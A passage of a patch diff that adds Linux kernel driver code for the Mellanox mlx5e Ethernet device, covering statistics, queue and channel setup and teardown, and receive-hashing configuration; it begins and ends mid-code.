+ + s->tx_multicast_bytes + + s->tx_broadcast_bytes; + + /* Update calculated offload counters */ + s->tx_csum_offload = s->tx_packets - tx_offload_none; + s->rx_csum_good = s->rx_packets - s->rx_csum_none; + +free_out: + kvfree(out); +} + +static void mlx5e_update_stats_work(struct work_struct *work) +{ + struct delayed_work *dwork = to_delayed_work(work); + struct mlx5e_priv *priv = container_of(dwork, struct mlx5e_priv, + update_stats_work); + mutex_lock(&priv->state_lock); + if (test_bit(MLX5E_STATE_OPENED, &priv->state)) { + mlx5e_update_stats(priv); + schedule_delayed_work(dwork, + msecs_to_jiffies( + MLX5E_UPDATE_STATS_INTERVAL)); + } + mutex_unlock(&priv->state_lock); +} + +static void __mlx5e_async_event(struct mlx5e_priv *priv, + enum mlx5_dev_event event) +{ + switch (event) { + case MLX5_DEV_EVENT_PORT_UP: + case MLX5_DEV_EVENT_PORT_DOWN: + schedule_work(&priv->update_carrier_work); + break; + + default: + break; + } +} + +static void mlx5e_async_event(struct mlx5_core_dev *mdev, void *vpriv, + enum mlx5_dev_event event, unsigned long param) +{ + struct mlx5e_priv *priv = vpriv; + + spin_lock(&priv->async_events_spinlock); + if (test_bit(MLX5E_STATE_ASYNC_EVENTS_ENABLE, &priv->state)) + __mlx5e_async_event(priv, event); + spin_unlock(&priv->async_events_spinlock); +} + +static void mlx5e_enable_async_events(struct mlx5e_priv *priv) +{ + set_bit(MLX5E_STATE_ASYNC_EVENTS_ENABLE, &priv->state); +} + +static void mlx5e_disable_async_events(struct mlx5e_priv *priv) +{ + spin_lock_irq(&priv->async_events_spinlock); + clear_bit(MLX5E_STATE_ASYNC_EVENTS_ENABLE, &priv->state); + spin_unlock_irq(&priv->async_events_spinlock); +} + +static void mlx5e_send_nop(struct mlx5e_sq *sq) +{ + struct mlx5_wq_cyc *wq = &sq->wq; + + u16 pi = sq->pc & wq->sz_m1; + struct mlx5e_tx_wqe *wqe = mlx5_wq_cyc_get_wqe(wq, pi); + + struct mlx5_wqe_ctrl_seg *cseg = &wqe->ctrl; + + memset(cseg, 0, sizeof(*cseg)); + + cseg->opmod_idx_opcode = cpu_to_be32((sq->pc << 8) | MLX5_OPCODE_NOP); + cseg->qpn_ds = cpu_to_be32((sq->sqn << 8) | 0x01); + cseg->fm_ce_se = MLX5_WQE_CTRL_CQ_UPDATE; + + sq->skb[pi] = NULL; + sq->pc++; + mlx5e_tx_notify_hw(sq, wqe); +} + +static int mlx5e_create_rq(struct mlx5e_channel *c, + struct mlx5e_rq_param *param, + struct mlx5e_rq *rq) +{ + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + void *rqc = param->rqc; + void *rqc_wq = MLX5_ADDR_OF(rqc, rqc, wq); + int wq_sz; + int err; + int i; + + err = mlx5_wq_ll_create(mdev, &param->wq, rqc_wq, &rq->wq, + &rq->wq_ctrl); + if (err) + return err; + + rq->wq.db = &rq->wq.db[MLX5_RCV_DBR]; + + wq_sz = mlx5_wq_ll_get_size(&rq->wq); + rq->skb
= kzalloc_node(wq_sz * sizeof(*rq->skb), GFP_KERNEL, + cpu_to_node(c->cpu)); + if (!rq->skb) { + err = -ENOMEM; + goto err_rq_wq_destroy; + } + + rq->wqe_sz = (priv->params.lro_en) ? priv->params.lro_wqe_sz : + priv->netdev->mtu + ETH_HLEN + VLAN_HLEN; + + for (i = 0; i < wq_sz; i++) { + struct mlx5e_rx_wqe *wqe = mlx5_wq_ll_get_wqe(&rq->wq, i); + + wqe->data.lkey = c->mkey_be; + wqe->data.byte_count = cpu_to_be32(rq->wqe_sz); + } + + rq->pdev = c->pdev; + rq->netdev = c->netdev; + rq->channel = c; + rq->ix = c->ix; + + return 0; + +err_rq_wq_destroy: + mlx5_wq_destroy(&rq->wq_ctrl); + + return err; +} + +static void mlx5e_destroy_rq(struct mlx5e_rq *rq) +{ + kfree(rq->skb); + mlx5_wq_destroy(&rq->wq_ctrl); +} + +static int mlx5e_enable_rq(struct mlx5e_rq *rq, struct mlx5e_rq_param *param) +{ + struct mlx5e_channel *c = rq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + void *in; + void *rqc; + void *wq; + int inlen; + int err; + + inlen = MLX5_ST_SZ_BYTES(create_rq_in) + + sizeof(u64) * rq->wq_ctrl.buf.npages; + in = mlx5_vzalloc(inlen); + if (!in) + return -ENOMEM; + + rqc = MLX5_ADDR_OF(create_rq_in, in, ctx); + wq = MLX5_ADDR_OF(rqc, rqc, wq); + + memcpy(rqc, param->rqc, sizeof(param->rqc)); + + MLX5_SET(rqc, rqc, cqn, c->rq.cq.mcq.cqn); + MLX5_SET(rqc, rqc, state, MLX5_RQC_STATE_RST); + MLX5_SET(rqc, rqc, flush_in_error_en, 1); + MLX5_SET(wq, wq, wq_type, MLX5_WQ_TYPE_LINKED_LIST); + MLX5_SET(wq, wq, log_wq_pg_sz, rq->wq_ctrl.buf.page_shift - + PAGE_SHIFT); + MLX5_SET64(wq, wq, dbr_addr, rq->wq_ctrl.db.dma); + + mlx5_fill_page_array(&rq->wq_ctrl.buf, + (__be64 *)MLX5_ADDR_OF(wq, wq, pas)); + + err = mlx5_create_rq(mdev, in, inlen, &rq->rqn); + + kvfree(in); + + return err; +} + +static int mlx5e_modify_rq(struct mlx5e_rq *rq, int curr_state, int next_state) +{ + struct mlx5e_channel *c = rq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + void *in; + void *rqc; + int inlen; + int err; + + inlen = MLX5_ST_SZ_BYTES(modify_rq_in); + in = mlx5_vzalloc(inlen); + if (!in) + return -ENOMEM; + + rqc = MLX5_ADDR_OF(modify_rq_in, in, ctx); + + MLX5_SET(modify_rq_in, in, rq_state, curr_state); + MLX5_SET(rqc, rqc, state, next_state); + + err = mlx5_modify_rq(mdev, rq->rqn, in, inlen); + + kvfree(in); + + return err; +} + +static void mlx5e_disable_rq(struct mlx5e_rq *rq) +{ + struct mlx5e_channel *c = rq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + mlx5_destroy_rq(mdev, rq->rqn); +} + +static int mlx5e_wait_for_min_rx_wqes(struct mlx5e_rq *rq) +{ + struct mlx5e_channel *c = rq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_wq_ll *wq = &rq->wq; + int i; + + for (i = 0; i < 1000; i++) { + if (wq->cur_sz >= priv->params.min_rx_wqes) + return 0; + + msleep(20); + } + + return -ETIMEDOUT; +} + +static int mlx5e_open_rq(struct mlx5e_channel *c, + struct mlx5e_rq_param *param, + struct mlx5e_rq *rq) +{ + int err; + + err = mlx5e_create_rq(c, param, rq); + if (err) + return err; + + err = mlx5e_enable_rq(rq, param); + if (err) + goto err_destroy_rq; + + err = mlx5e_modify_rq(rq, MLX5_RQC_STATE_RST, MLX5_RQC_STATE_RDY); + if (err) + goto err_disable_rq; + + set_bit(MLX5E_RQ_STATE_POST_WQES_ENABLE, &rq->state); + mlx5e_send_nop(&c->sq[0]); /* trigger mlx5e_post_rx_wqes() */ + + return 0; + +err_disable_rq: + mlx5e_disable_rq(rq); +err_destroy_rq: + mlx5e_destroy_rq(rq); + + return err; +} + +static void mlx5e_close_rq(struct mlx5e_rq *rq) +{ + 
clear_bit(MLX5E_RQ_STATE_POST_WQES_ENABLE, &rq->state); + napi_synchronize(&rq->channel->napi); /* prevent mlx5e_post_rx_wqes */ + + mlx5e_modify_rq(rq, MLX5_RQC_STATE_RDY, MLX5_RQC_STATE_ERR); + while (!mlx5_wq_ll_is_empty(&rq->wq)) + msleep(20); + + /* avoid destroying rq before mlx5e_poll_rx_cq() is done with it */ + napi_synchronize(&rq->channel->napi); + + mlx5e_disable_rq(rq); + mlx5e_destroy_rq(rq); +} + +static void mlx5e_free_sq_db(struct mlx5e_sq *sq) +{ + kfree(sq->dma_fifo); + kfree(sq->skb); +} + +static int mlx5e_alloc_sq_db(struct mlx5e_sq *sq, int numa) +{ + int wq_sz = mlx5_wq_cyc_get_size(&sq->wq); + int df_sz = wq_sz * MLX5_SEND_WQEBB_NUM_DS; + + sq->skb = kzalloc_node(wq_sz * sizeof(*sq->skb), GFP_KERNEL, numa); + sq->dma_fifo = kzalloc_node(df_sz * sizeof(*sq->dma_fifo), GFP_KERNEL, + numa); + + if (!sq->skb || !sq->dma_fifo) { + mlx5e_free_sq_db(sq); + return -ENOMEM; + } + + sq->dma_fifo_mask = df_sz - 1; + + return 0; +} + +static int mlx5e_create_sq(struct mlx5e_channel *c, + int tc, + struct mlx5e_sq_param *param, + struct mlx5e_sq *sq) +{ + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + void *sqc = param->sqc; + void *sqc_wq = MLX5_ADDR_OF(sqc, sqc, wq); + int err; + + err = mlx5_alloc_map_uar(mdev, &sq->uar); + if (err) + return err; + + err = mlx5_wq_cyc_create(mdev, &param->wq, sqc_wq, &sq->wq, + &sq->wq_ctrl); + if (err) + goto err_unmap_free_uar; + + sq->wq.db = &sq->wq.db[MLX5_SND_DBR]; + sq->uar_map = sq->uar.map; + sq->bf_buf_size = (1 << MLX5_CAP_GEN(mdev, log_bf_reg_size)) / 2; + + if (mlx5e_alloc_sq_db(sq, cpu_to_node(c->cpu))) + goto err_sq_wq_destroy; + + sq->txq = netdev_get_tx_queue(priv->netdev, + c->ix + tc * priv->params.num_channels); + + sq->pdev = c->pdev; + sq->mkey_be = c->mkey_be; + sq->channel = c; + sq->tc = tc; + + return 0; + +err_sq_wq_destroy: + mlx5_wq_destroy(&sq->wq_ctrl); + +err_unmap_free_uar: + mlx5_unmap_free_uar(mdev, &sq->uar); + + return err; +} + +static void mlx5e_destroy_sq(struct mlx5e_sq *sq) +{ + struct mlx5e_channel *c = sq->channel; + struct mlx5e_priv *priv = c->priv; + + mlx5e_free_sq_db(sq); + mlx5_wq_destroy(&sq->wq_ctrl); + mlx5_unmap_free_uar(priv->mdev, &sq->uar); +} + +static int mlx5e_enable_sq(struct mlx5e_sq *sq, struct mlx5e_sq_param *param) +{ + struct mlx5e_channel *c = sq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + void *in; + void *sqc; + void *wq; + int inlen; + int err; + + inlen = MLX5_ST_SZ_BYTES(create_sq_in) + + sizeof(u64) * sq->wq_ctrl.buf.npages; + in = mlx5_vzalloc(inlen); + if (!in) + return -ENOMEM; + + sqc = MLX5_ADDR_OF(create_sq_in, in, ctx); + wq = MLX5_ADDR_OF(sqc, sqc, wq); + + memcpy(sqc, param->sqc, sizeof(param->sqc)); + + MLX5_SET(sqc, sqc, user_index, sq->tc); + MLX5_SET(sqc, sqc, tis_num_0, priv->tisn[sq->tc]); + MLX5_SET(sqc, sqc, cqn, c->sq[sq->tc].cq.mcq.cqn); + MLX5_SET(sqc, sqc, state, MLX5_SQC_STATE_RST); + MLX5_SET(sqc, sqc, tis_lst_sz, 1); + MLX5_SET(sqc, sqc, flush_in_error_en, 1); + + MLX5_SET(wq, wq, wq_type, MLX5_WQ_TYPE_CYCLIC); + MLX5_SET(wq, wq, uar_page, sq->uar.index); + MLX5_SET(wq, wq, log_wq_pg_sz, sq->wq_ctrl.buf.page_shift - + PAGE_SHIFT); + MLX5_SET64(wq, wq, dbr_addr, sq->wq_ctrl.db.dma); + + mlx5_fill_page_array(&sq->wq_ctrl.buf, + (__be64 *)MLX5_ADDR_OF(wq, wq, pas)); + + err = mlx5_create_sq(mdev, in, inlen, &sq->sqn); + + kvfree(in); + + return err; +} + +static int mlx5e_modify_sq(struct mlx5e_sq *sq, int curr_state, int next_state) +{ + struct mlx5e_channel *c =
sq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + void *in; + void *sqc; + int inlen; + int err; + + inlen = MLX5_ST_SZ_BYTES(modify_sq_in); + in = mlx5_vzalloc(inlen); + if (!in) + return -ENOMEM; + + sqc = MLX5_ADDR_OF(modify_sq_in, in, ctx); + + MLX5_SET(modify_sq_in, in, sq_state, curr_state); + MLX5_SET(sqc, sqc, state, next_state); + + err = mlx5_modify_sq(mdev, sq->sqn, in, inlen); + + kvfree(in); + + return err; +} + +static void mlx5e_disable_sq(struct mlx5e_sq *sq) +{ + struct mlx5e_channel *c = sq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + mlx5_destroy_sq(mdev, sq->sqn); +} + +static int mlx5e_open_sq(struct mlx5e_channel *c, + int tc, + struct mlx5e_sq_param *param, + struct mlx5e_sq *sq) +{ + int err; + + err = mlx5e_create_sq(c, tc, param, sq); + if (err) + return err; + + err = mlx5e_enable_sq(sq, param); + if (err) + goto err_destroy_sq; + + err = mlx5e_modify_sq(sq, MLX5_SQC_STATE_RST, MLX5_SQC_STATE_RDY); + if (err) + goto err_disable_sq; + + set_bit(MLX5E_SQ_STATE_WAKE_TXQ_ENABLE, &sq->state); + netdev_tx_reset_queue(sq->txq); + netif_tx_start_queue(sq->txq); + + return 0; + +err_disable_sq: + mlx5e_disable_sq(sq); +err_destroy_sq: + mlx5e_destroy_sq(sq); + + return err; +} + +static inline void netif_tx_disable_queue(struct netdev_queue *txq) +{ + __netif_tx_lock_bh(txq); + netif_tx_stop_queue(txq); + __netif_tx_unlock_bh(txq); +} + +static void mlx5e_close_sq(struct mlx5e_sq *sq) +{ + clear_bit(MLX5E_SQ_STATE_WAKE_TXQ_ENABLE, &sq->state); + napi_synchronize(&sq->channel->napi); /* prevent netif_tx_wake_queue */ + netif_tx_disable_queue(sq->txq); + + /* ensure hw is notified of all pending wqes */ + if (mlx5e_sq_has_room_for(sq, 1)) + mlx5e_send_nop(sq); + + mlx5e_modify_sq(sq, MLX5_SQC_STATE_RDY, MLX5_SQC_STATE_ERR); + while (sq->cc != sq->pc) /* wait till sq is empty */ + msleep(20); + + /* avoid destroying sq before mlx5e_poll_tx_cq() is done with it */ + napi_synchronize(&sq->channel->napi); + + mlx5e_disable_sq(sq); + mlx5e_destroy_sq(sq); +} + +static int mlx5e_create_cq(struct mlx5e_channel *c, + struct mlx5e_cq_param *param, + struct mlx5e_cq *cq) +{ + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + struct mlx5_core_cq *mcq = &cq->mcq; + int eqn_not_used; + int irqn; + int err; + u32 i; + + param->wq.numa = cpu_to_node(c->cpu); + param->eq_ix = c->ix; + + err = mlx5_cqwq_create(mdev, &param->wq, param->cqc, &cq->wq, + &cq->wq_ctrl); + if (err) + return err; + + mlx5_vector2eqn(mdev, param->eq_ix, &eqn_not_used, &irqn); + + cq->napi = &c->napi; + + mcq->cqe_sz = 64; + mcq->set_ci_db = cq->wq_ctrl.db.db; + mcq->arm_db = cq->wq_ctrl.db.db + 1; + *mcq->set_ci_db = 0; + *mcq->arm_db = 0; + mcq->vector = param->eq_ix; + mcq->comp = mlx5e_completion_event; + mcq->event = mlx5e_cq_error_event; + mcq->irqn = irqn; + mcq->uar = &priv->cq_uar; + + for (i = 0; i < mlx5_cqwq_get_size(&cq->wq); i++) { + struct mlx5_cqe64 *cqe = mlx5_cqwq_get_wqe(&cq->wq, i); + + cqe->op_own = 0xf1; + } + + cq->channel = c; + + return 0; +} + +static void mlx5e_destroy_cq(struct mlx5e_cq *cq) +{ + mlx5_wq_destroy(&cq->wq_ctrl); +} + +static int mlx5e_enable_cq(struct mlx5e_cq *cq, struct mlx5e_cq_param *param) +{ + struct mlx5e_channel *c = cq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + struct mlx5_core_cq *mcq = &cq->mcq; + + void *in; + void *cqc; + int inlen; + int irqn_not_used; + int eqn; + int err; + + inlen =
MLX5_ST_SZ_BYTES(create_cq_in) + + sizeof(u64) * cq->wq_ctrl.buf.npages; + in = mlx5_vzalloc(inlen); + if (!in) + return -ENOMEM; + + cqc = MLX5_ADDR_OF(create_cq_in, in, cq_context); + + memcpy(cqc, param->cqc, sizeof(param->cqc)); + + mlx5_fill_page_array(&cq->wq_ctrl.buf, + (__be64 *)MLX5_ADDR_OF(create_cq_in, in, pas)); + + mlx5_vector2eqn(mdev, param->eq_ix, &eqn, &irqn_not_used); + + MLX5_SET(cqc, cqc, c_eqn, eqn); + MLX5_SET(cqc, cqc, uar_page, mcq->uar->index); + MLX5_SET(cqc, cqc, log_page_size, cq->wq_ctrl.buf.page_shift - + PAGE_SHIFT); + MLX5_SET64(cqc, cqc, dbr_addr, cq->wq_ctrl.db.dma); + + err = mlx5_core_create_cq(mdev, mcq, in, inlen); + + kvfree(in); + + if (err) + return err; + + mlx5e_cq_arm(cq); + + return 0; +} + +static void mlx5e_disable_cq(struct mlx5e_cq *cq) +{ + struct mlx5e_channel *c = cq->channel; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + mlx5_core_destroy_cq(mdev, &cq->mcq); +} + +static int mlx5e_open_cq(struct mlx5e_channel *c, + struct mlx5e_cq_param *param, + struct mlx5e_cq *cq, + u16 moderation_usecs, + u16 moderation_frames) +{ + int err; + struct mlx5e_priv *priv = c->priv; + struct mlx5_core_dev *mdev = priv->mdev; + + err = mlx5e_create_cq(c, param, cq); + if (err) + return err; + + err = mlx5e_enable_cq(cq, param); + if (err) + goto err_destroy_cq; + + err = mlx5_core_modify_cq_moderation(mdev, &cq->mcq, + moderation_usecs, + moderation_frames); + if (err) + goto err_destroy_cq; + + return 0; + +err_destroy_cq: + mlx5e_destroy_cq(cq); + + return err; +} + +static void mlx5e_close_cq(struct mlx5e_cq *cq) +{ + mlx5e_disable_cq(cq); + mlx5e_destroy_cq(cq); +} + +static int mlx5e_get_cpu(struct mlx5e_priv *priv, int ix) +{ + return cpumask_first(priv->mdev->priv.irq_info[ix].mask); +} + +static int mlx5e_open_tx_cqs(struct mlx5e_channel *c, + struct mlx5e_channel_param *cparam) +{ + struct mlx5e_priv *priv = c->priv; + int err; + int tc; + + for (tc = 0; tc < c->num_tc; tc++) { + err = mlx5e_open_cq(c, &cparam->tx_cq, &c->sq[tc].cq, + priv->params.tx_cq_moderation_usec, + priv->params.tx_cq_moderation_pkts); + if (err) + goto err_close_tx_cqs; + + c->sq[tc].cq.sqrq = &c->sq[tc]; + } + + return 0; + +err_close_tx_cqs: + for (tc--; tc >= 0; tc--) + mlx5e_close_cq(&c->sq[tc].cq); + + return err; +} + +static void mlx5e_close_tx_cqs(struct mlx5e_channel *c) +{ + int tc; + + for (tc = 0; tc < c->num_tc; tc++) + mlx5e_close_cq(&c->sq[tc].cq); +} + +static int mlx5e_open_sqs(struct mlx5e_channel *c, + struct mlx5e_channel_param *cparam) +{ + int err; + int tc; + + for (tc = 0; tc < c->num_tc; tc++) { + err = mlx5e_open_sq(c, tc, &cparam->sq, &c->sq[tc]); + if (err) + goto err_close_sqs; + } + + return 0; + +err_close_sqs: + for (tc--; tc >= 0; tc--) + mlx5e_close_sq(&c->sq[tc]); + + return err; +} + +static void mlx5e_close_sqs(struct mlx5e_channel *c) +{ + int tc; + + for (tc = 0; tc < c->num_tc; tc++) + mlx5e_close_sq(&c->sq[tc]); +} + +static int mlx5e_open_channel(struct mlx5e_priv *priv, int ix, + struct mlx5e_channel_param *cparam, + struct mlx5e_channel **cp) +{ + struct net_device *netdev = priv->netdev; + int cpu = mlx5e_get_cpu(priv, ix); + struct mlx5e_channel *c; + int err; + + c = kzalloc_node(sizeof(*c), GFP_KERNEL, cpu_to_node(cpu)); + if (!c) + return -ENOMEM; + + c->priv = priv; + c->ix = ix; + c->cpu = cpu; + c->pdev = &priv->mdev->pdev->dev; + c->netdev = priv->netdev; + c->mkey_be = cpu_to_be32(priv->mr.key); + c->num_tc = priv->num_tc; + + netif_napi_add(netdev, &c->napi, mlx5e_napi_poll, 64); + 
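/* The per-channel bring-up that follows is strictly ordered: the TX CQs
 * and the RX CQ are created first, NAPI is enabled, and only then are
 * the SQs and finally the RQ opened, so each completion queue exists
 * before the queue that posts to it; the error labels at the bottom of
 * mlx5e_open_channel() unwind in exactly the reverse order. */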
+ err = mlx5e_open_tx_cqs(c, cparam); + if (err) + goto err_napi_del; + + err = mlx5e_open_cq(c, &cparam->rx_cq, &c->rq.cq, + priv->params.rx_cq_moderation_usec, + priv->params.rx_cq_moderation_pkts); + if (err) + goto err_close_tx_cqs; + c->rq.cq.sqrq = &c->rq; + + napi_enable(&c->napi); + + err = mlx5e_open_sqs(c, cparam); + if (err) + goto err_disable_napi; + + err = mlx5e_open_rq(c, &cparam->rq, &c->rq); + if (err) + goto err_close_sqs; + + netif_set_xps_queue(netdev, get_cpu_mask(c->cpu), ix); + *cp = c; + + return 0; + +err_close_sqs: + mlx5e_close_sqs(c); + +err_disable_napi: + napi_disable(&c->napi); + mlx5e_close_cq(&c->rq.cq); + +err_close_tx_cqs: + mlx5e_close_tx_cqs(c); + +err_napi_del: + netif_napi_del(&c->napi); + kfree(c); + + return err; +} + +static void mlx5e_close_channel(struct mlx5e_channel *c) +{ + mlx5e_close_rq(&c->rq); + mlx5e_close_sqs(c); + napi_disable(&c->napi); + mlx5e_close_cq(&c->rq.cq); + mlx5e_close_tx_cqs(c); + netif_napi_del(&c->napi); + kfree(c); +} + +static void mlx5e_build_rq_param(struct mlx5e_priv *priv, + struct mlx5e_rq_param *param) +{ + void *rqc = param->rqc; + void *wq = MLX5_ADDR_OF(rqc, rqc, wq); + + MLX5_SET(wq, wq, wq_type, MLX5_WQ_TYPE_LINKED_LIST); + MLX5_SET(wq, wq, end_padding_mode, MLX5_WQ_END_PAD_MODE_ALIGN); + MLX5_SET(wq, wq, log_wq_stride, ilog2(sizeof(struct mlx5e_rx_wqe))); + MLX5_SET(wq, wq, log_wq_sz, priv->params.log_rq_size); + MLX5_SET(wq, wq, pd, priv->pdn); + + param->wq.numa = dev_to_node(&priv->mdev->pdev->dev); + param->wq.linear = 1; +} + +static void mlx5e_build_sq_param(struct mlx5e_priv *priv, + struct mlx5e_sq_param *param) +{ + void *sqc = param->sqc; + void *wq = MLX5_ADDR_OF(sqc, sqc, wq); + + MLX5_SET(wq, wq, log_wq_sz, priv->params.log_sq_size); + MLX5_SET(wq, wq, log_wq_stride, ilog2(MLX5_SEND_WQE_BB)); + MLX5_SET(wq, wq, pd, priv->pdn); + + param->wq.numa = dev_to_node(&priv->mdev->pdev->dev); +} + +static void mlx5e_build_common_cq_param(struct mlx5e_priv *priv, + struct mlx5e_cq_param *param) +{ + void *cqc = param->cqc; + + MLX5_SET(cqc, cqc, uar_page, priv->cq_uar.index); +} + +static void mlx5e_build_rx_cq_param(struct mlx5e_priv *priv, + struct mlx5e_cq_param *param) +{ + void *cqc = param->cqc; + + MLX5_SET(cqc, cqc, log_cq_size, priv->params.log_rq_size); + + mlx5e_build_common_cq_param(priv, param); +} + +static void mlx5e_build_tx_cq_param(struct mlx5e_priv *priv, + struct mlx5e_cq_param *param) +{ + void *cqc = param->cqc; + + MLX5_SET(cqc, cqc, log_cq_size, priv->params.log_sq_size); + + mlx5e_build_common_cq_param(priv, param); +} + +static void mlx5e_build_channel_param(struct mlx5e_priv *priv, + struct mlx5e_channel_param *cparam) +{ + memset(cparam, 0, sizeof(*cparam)); + + mlx5e_build_rq_param(priv, &cparam->rq); + mlx5e_build_sq_param(priv, &cparam->sq); + mlx5e_build_rx_cq_param(priv, &cparam->rx_cq); + mlx5e_build_tx_cq_param(priv, &cparam->tx_cq); +} + +static int mlx5e_open_channels(struct mlx5e_priv *priv) +{ + struct mlx5e_channel_param cparam; + int err; + int i; + int j; + + priv->channel = kcalloc(priv->params.num_channels, + sizeof(struct mlx5e_channel *), GFP_KERNEL); + if (!priv->channel) + return -ENOMEM; + + mlx5e_build_channel_param(priv, &cparam); + for (i = 0; i < priv->params.num_channels; i++) { + err = mlx5e_open_channel(priv, i, &cparam, &priv->channel[i]); + if (err) + goto err_close_channels; + } + + for (j = 0; j < priv->params.num_channels; j++) { + err = mlx5e_wait_for_min_rx_wqes(&priv->channel[j]->rq); + if (err) + goto err_close_channels; + } + + return 0; + 
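/* If opening channel i (or waiting for its RQ to reach min_rx_wqes)
 * fails, the error path below closes only the channels that were fully
 * opened and then frees the channel array; mlx5e_close_channels() does
 * the same teardown for the fully opened case. */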
+err_close_channels: + for (i--; i >= 0; i--) + mlx5e_close_channel(priv->channel[i]); + + kfree(priv->channel); + + return err; +} + +static void mlx5e_close_channels(struct mlx5e_priv *priv) +{ + int i; + + for (i = 0; i < priv->params.num_channels; i++) + mlx5e_close_channel(priv->channel[i]); + + kfree(priv->channel); +} + +static int mlx5e_open_tis(struct mlx5e_priv *priv, int tc) +{ + struct mlx5_core_dev *mdev = priv->mdev; + u32 in[MLX5_ST_SZ_DW(create_tis_in)]; + void *tisc = MLX5_ADDR_OF(create_tis_in, in, ctx); + + memset(in, 0, sizeof(in)); + + MLX5_SET(tisc, tisc, prio, tc); + + return mlx5_create_tis(mdev, in, sizeof(in), &priv->tisn[tc]); +} + +static void mlx5e_close_tis(struct mlx5e_priv *priv, int tc) +{ + mlx5_destroy_tis(priv->mdev, priv->tisn[tc]); +} + +static int mlx5e_open_tises(struct mlx5e_priv *priv) +{ + int num_tc = priv->num_tc; + int err; + int tc; + + for (tc = 0; tc < num_tc; tc++) { + err = mlx5e_open_tis(priv, tc); + if (err) + goto err_close_tises; + } + + return 0; + +err_close_tises: + for (tc--; tc >= 0; tc--) + mlx5e_close_tis(priv, tc); + + return err; +} + +static void mlx5e_close_tises(struct mlx5e_priv *priv) +{ + int num_tc = priv->num_tc; + int tc; + + for (tc = 0; tc < num_tc; tc++) + mlx5e_close_tis(priv, tc); +} + +static int mlx5e_open_rqt(struct mlx5e_priv *priv) +{ + struct mlx5_core_dev *mdev = priv->mdev; + u32 *in; + u32 out[MLX5_ST_SZ_DW(create_rqt_out)]; + void *rqtc; + int inlen; + int err; + int sz; + int i; + + sz = 1 << priv->params.rx_hash_log_tbl_sz; + + inlen = MLX5_ST_SZ_BYTES(create_rqt_in) + sizeof(u32) * sz; + in = mlx5_vzalloc(inlen); + if (!in) + return -ENOMEM; + + rqtc = MLX5_ADDR_OF(create_rqt_in, in, rqt_context); + + MLX5_SET(rqtc, rqtc, rqt_actual_size, sz); + MLX5_SET(rqtc, rqtc, rqt_max_size, sz); + + for (i = 0; i < sz; i++) { + int ix = i % priv->params.num_channels; + + MLX5_SET(rqtc, rqtc, rq_num[i], priv->channel[ix]->rq.rqn); + } + + MLX5_SET(create_rqt_in, in, opcode, MLX5_CMD_OP_CREATE_RQT); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(mdev, in, inlen, out, sizeof(out)); + if (!err) + priv->rqtn = MLX5_GET(create_rqt_out, out, rqtn); + + kvfree(in); + + return err; +} + +static void mlx5e_close_rqt(struct mlx5e_priv *priv) +{ + u32 in[MLX5_ST_SZ_DW(destroy_rqt_in)]; + u32 out[MLX5_ST_SZ_DW(destroy_rqt_out)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(destroy_rqt_in, in, opcode, MLX5_CMD_OP_DESTROY_RQT); + MLX5_SET(destroy_rqt_in, in, rqtn, priv->rqtn); + + mlx5_cmd_exec_check_status(priv->mdev, in, sizeof(in), out, + sizeof(out)); +} + +static void mlx5e_build_tir_ctx(struct mlx5e_priv *priv, u32 *tirc, int tt) +{ + void *hfso = MLX5_ADDR_OF(tirc, tirc, rx_hash_field_selector_outer); + +#define ROUGH_MAX_L2_L3_HDR_SZ 256 + +#define MLX5_HASH_IP (MLX5_HASH_FIELD_SEL_SRC_IP |\ + MLX5_HASH_FIELD_SEL_DST_IP) + +#define MLX5_HASH_ALL (MLX5_HASH_FIELD_SEL_SRC_IP |\ + MLX5_HASH_FIELD_SEL_DST_IP |\ + MLX5_HASH_FIELD_SEL_L4_SPORT |\ + MLX5_HASH_FIELD_SEL_L4_DPORT) + + if (priv->params.lro_en) { + MLX5_SET(tirc, tirc, lro_enable_mask, + MLX5_TIRC_LRO_ENABLE_MASK_IPV4_LRO | + MLX5_TIRC_LRO_ENABLE_MASK_IPV6_LRO); + MLX5_SET(tirc, tirc, lro_max_ip_payload_size, + (priv->params.lro_wqe_sz - + ROUGH_MAX_L2_L3_HDR_SZ) >> 8); + MLX5_SET(tirc, tirc, lro_timeout_period_usecs, + MLX5_CAP_ETH(priv->mdev, + lro_timer_supported_periods[3])); + } + + switch (tt) { + case MLX5E_TT_ANY: + MLX5_SET(tirc, tirc, disp_type, + MLX5_TIRC_DISP_TYPE_DIRECT); + MLX5_SET(tirc, tirc, inline_rqn, + 
priv->channel[0]->rq.rqn); + break; + default: + MLX5_SET(tirc, tirc, disp_type, + MLX5_TIRC_DISP_TYPE_INDIRECT); + MLX5_SET(tirc, tirc, indirect_table, + priv->rqtn); + MLX5_SET(tirc, tirc, rx_hash_fn, + MLX5_TIRC_RX_HASH_FN_HASH_TOEPLITZ); + MLX5_SET(tirc, tirc, rx_hash_symmetric, 1); + netdev_rss_key_fill(MLX5_ADDR_OF(tirc, tirc, + rx_hash_toeplitz_key), + MLX5_FLD_SZ_BYTES(tirc, + rx_hash_toeplitz_key)); + break; + } + + switch (tt) { + case MLX5E_TT_IPV4_TCP: + MLX5_SET(rx_hash_field_select, hfso, l3_prot_type, + MLX5_L3_PROT_TYPE_IPV4); + MLX5_SET(rx_hash_field_select, hfso, l4_prot_type, + MLX5_L4_PROT_TYPE_TCP); + MLX5_SET(rx_hash_field_select, hfso, selected_fields, + MLX5_HASH_ALL); + break; + + case MLX5E_TT_IPV6_TCP: + MLX5_SET(rx_hash_field_select, hfso, l3_prot_type, + MLX5_L3_PROT_TYPE_IPV6); + 